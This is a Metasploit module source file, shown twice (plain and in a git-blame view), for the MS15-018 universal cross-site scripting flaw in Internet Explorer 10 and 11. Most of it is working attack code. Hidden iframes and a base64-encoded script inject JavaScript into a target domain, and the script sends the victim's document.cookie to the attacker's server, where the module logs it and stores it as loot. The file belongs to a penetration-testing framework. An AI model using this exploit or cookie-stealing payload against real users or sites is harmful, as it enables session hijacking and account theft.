metasploit-framework/modules/auxiliary/gather/ie_uxss_injection.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpServer

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
      'Description'    => %q{
          This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
          Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
          have X-Frame-Options or it will fail). You can also have your own custom JavaScript
          by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
          you are behind NAT.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'David Leo',      # Original discovery
          'filedescriptor', # PoC
          'joev',           # He figured it out really
          'sinn3r'          # MSF
        ],
      'References'     =>
        [
          [ 'CVE', '2015-0072' ],
          [ 'OSVDB', '117876' ],
          [ 'MSB', 'MS15-018' ],
          [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
        ],
      'Platform'       => 'win',
      'DisclosureDate' => "Feb 1 2015"
    ))

    register_options(
    [
      OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
      OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
    ], self.class)
  end

  def setup
    if target_uri !~ /^http/i
      raise Msf::OptionValidateError.new(['TARGET_URI'])
    end

    super
  end

  def target_uri
    datastore['TARGET_URI']
  end

  def get_html
    @html ||= html
  end

  def ninja_cookie_stealer_name
    @ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
  end

  def get_uri(cli=self.cli)
    ssl = datastore["SSL"]
    proto = (ssl ? "https://" : "http://")
    if datastore['URIHOST']
      host = datastore['URIHOST']
    elsif (cli and cli.peerhost)
      host = Rex::Socket.source_address(cli.peerhost)
    else
      host = srvhost_addr
    end

    if Rex::Socket.is_ipv6?(host)
      host = "[#{host}]"
    end

    if datastore['URIPORT'] != 0
      port = ':' + datastore['URIPORT'].to_s
    elsif (ssl and datastore["SRVPORT"] == 443)
      port = ''
    elsif (!ssl and datastore["SRVPORT"] == 80)
      port = ''
    else
      port = ":" + datastore["SRVPORT"].to_s
    end

    uri = proto + host + port + get_resource

    uri
  end

  def server_uri
    @server_uri ||= get_uri
  end

  def js
    datastore['CUSTOMJS'] || %Q|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);|
  end

  def html
    %Q|
<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
<script>
    window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };
    var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';
    top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
</script>
    |
  end

  def run
    exploit
  end

  def extract_cookie(uri)
    Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
  end

  def on_request_uri(cli, request)
    case request.uri
    when /redirect\.php/
      print_status("Sending redirect")
      send_redirect(cli, "#{datastore['TARGET_URI']}")
    when /sleep\.php/
      sleep(3)
      send_response(cli, '')
    when /#{ninja_cookie_stealer_name}/
      data = extract_cookie(request.uri)
      if data.blank?
        print_status("The XSS worked, but no cookie")
      else
        print_status("Got cookie")
        print_line(data)
        report_note(
          :host => cli.peerhost,
          :type => 'ie.cookie',
          :data => data
        )
        path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")
        vprint_good("Cookie stored as: #{path}")
      end
    else
      print_status("Sending HTML")
      send_response(cli, get_html)
    end
  end

end
IE UXSS 2015-02-05 09:03:28 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
IE UXSS 2015-02-05 09:03:28 +00:00
			`include Msf::Exploit::Remote::HttpServer`

			`def initialize(info={})`
			`super(update_info(info,`
Update MS15-018 MSB reference 2015-03-12 15:13:37 +00:00			`'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",`
IE UXSS 2015-02-05 09:03:28 +00:00			`'Description' => %q{`
An update 2015-02-05 17:29:52 +00:00			`This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet`
Final, really, I think 2015-02-05 20:59:24 +00:00			`Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot`
			`have X-Frame-Options or it will fail). You can also have your own custom JavaScript`
			`by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if`
			`you are behind NAT.`
IE UXSS 2015-02-05 09:03:28 +00:00			`},`
			`'License' => MSF_LICENSE,`
Final 2015-02-05 10:36:44 +00:00			`'Author' =>`
			`[`
An update 2015-02-05 17:29:52 +00:00			`'David Leo', # Original discovery`
			`'filedescriptor', # PoC`
Credit @joevennix 2015-02-05 18:25:38 +00:00			`'joev', # He figured it out really`
An update 2015-02-05 17:29:52 +00:00			`'sinn3r' # MSF`
Final 2015-02-05 10:36:44 +00:00			`],`
IE UXSS 2015-02-05 09:03:28 +00:00			`'References' =>`
			`[`
Add CVE reference for ie_uxss_injection 2015-02-12 23:16:59 +00:00			`[ 'CVE', '2015-0072' ],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '117876' ],`
Update MS15-018 MSB reference 2015-03-12 15:13:37 +00:00			`[ 'MSB', 'MS15-018' ],`
IE UXSS 2015-02-05 09:03:28 +00:00			`[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],`
			`[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]`
			`],`
			`'Platform' => 'win',`
Correct disclosure date 2015-02-05 21:00:13 +00:00			`'DisclosureDate' => "Feb 1 2015"`
IE UXSS 2015-02-05 09:03:28 +00:00			`))`

			`register_options(`
			`[`
Another update Thanks @joevennix 2015-02-05 18:23:32 +00:00			`OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),`
			`OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])`
IE UXSS 2015-02-05 09:03:28 +00:00			`], self.class)`
			`end`

			`def setup`
			`if target_uri !~ /^http/i`
			`raise Msf::OptionValidateError.new(['TARGET_URI'])`
			`end`

			`super`
			`end`

			`def target_uri`
Another update 2015-02-05 18:01:19 +00:00			`datastore['TARGET_URI']`
IE UXSS 2015-02-05 09:03:28 +00:00			`end`

			`def get_html`
			`@html \|\|= html`
			`end`

Final 2015-02-05 10:36:44 +00:00			`def ninja_cookie_stealer_name`
			`@ninja \|\|= "#{Rex::Text.rand_text_alpha(5)}.php"`
			`end`

			`def get_uri(cli=self.cli)`
Another update 2015-02-05 17:46:38 +00:00			`ssl = datastore["SSL"]`
Final 2015-02-05 10:36:44 +00:00			`proto = (ssl ? "https://" : "http://")`
			`if datastore['URIHOST']`
			`host = datastore['URIHOST']`
			`elsif (cli and cli.peerhost)`
			`host = Rex::Socket.source_address(cli.peerhost)`
			`else`
			`host = srvhost_addr`
			`end`

			`if Rex::Socket.is_ipv6?(host)`
			`host = "[#{host}]"`
			`end`

			`if datastore['URIPORT'] != 0`
			`port = ':' + datastore['URIPORT'].to_s`
			`elsif (ssl and datastore["SRVPORT"] == 443)`
			`port = ''`
			`elsif (!ssl and datastore["SRVPORT"] == 80)`
			`port = ''`
			`else`
			`port = ":" + datastore["SRVPORT"].to_s`
			`end`

			`uri = proto + host + port + get_resource`

			`uri`
			`end`

			`def server_uri`
			`@server_uri \|\|= get_uri`
			`end`

Another update Thanks @joevennix 2015-02-05 18:23:32 +00:00			`def js`
			`datastore['CUSTOMJS'] \|\| %Q\|var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);\|`
			`end`

IE UXSS 2015-02-05 09:03:28 +00:00			`def html`
			`%Q\|`
Final 2015-02-05 10:36:44 +00:00			`<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>`
			`<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>`
IE UXSS 2015-02-05 09:03:28 +00:00			`<script>`
Another update Thanks @joevennix 2015-02-05 18:23:32 +00:00			`window.onmessage = function(e){ top[1].postMessage(atob("#{Rex::Text.encode_base64(js)}"),"*"); };`
			`var payload = 'window.onmessage=function(e){ setTimeout(e.data); }; top.postMessage(\\\\"\\\\",\\\\"*\\\\")';`
Final 2015-02-05 10:36:44 +00:00			`top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');`
IE UXSS 2015-02-05 09:03:28 +00:00			`</script>`
			`\|`
			`end`

			`def run`
			`exploit`
			`end`

Final 2015-02-05 10:36:44 +00:00			`def extract_cookie(uri)`
			`Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)`
			`end`

IE UXSS 2015-02-05 09:03:28 +00:00			`def on_request_uri(cli, request)`
			`case request.uri`
			`when /redirect\.php/`
An update 2015-02-05 17:29:52 +00:00			`print_status("Sending redirect")`
IE UXSS 2015-02-05 09:03:28 +00:00			`send_redirect(cli, "#{datastore['TARGET_URI']}")`
Final 2015-02-05 10:36:44 +00:00			`when /sleep\.php/`
			`sleep(3)`
IE UXSS 2015-02-05 09:03:28 +00:00			`send_response(cli, '')`
Final 2015-02-05 10:36:44 +00:00			`when /#{ninja_cookie_stealer_name}/`
			`data = extract_cookie(request.uri)`
			`if data.blank?`
			`print_status("The XSS worked, but no cookie")`
			`else`
			`print_status("Got cookie")`
			`print_line(data)`
Change public ip option name and store cookie to db 2015-02-05 15:48:45 +00:00			`report_note(`
			`:host => cli.peerhost,`
			`:type => 'ie.cookie',`
			`:data => data`
			`)`
Use store_loot to store coookie 2015-02-05 17:36:35 +00:00			`path = store_loot('ie_uxss_cookie', "text/plain", cli.peerhost, data, "#{cli.peerhost}_ie_cookie.txt", "IE Cookie")`
			`vprint_good("Cookie stored as: #{path}")`
Final 2015-02-05 10:36:44 +00:00			`end`
IE UXSS 2015-02-05 09:03:28 +00:00			`else`
An update 2015-02-05 17:29:52 +00:00			`print_status("Sending HTML")`
IE UXSS 2015-02-05 09:03:28 +00:00			`send_response(cli, get_html)`
			`end`
			`end`

			`end`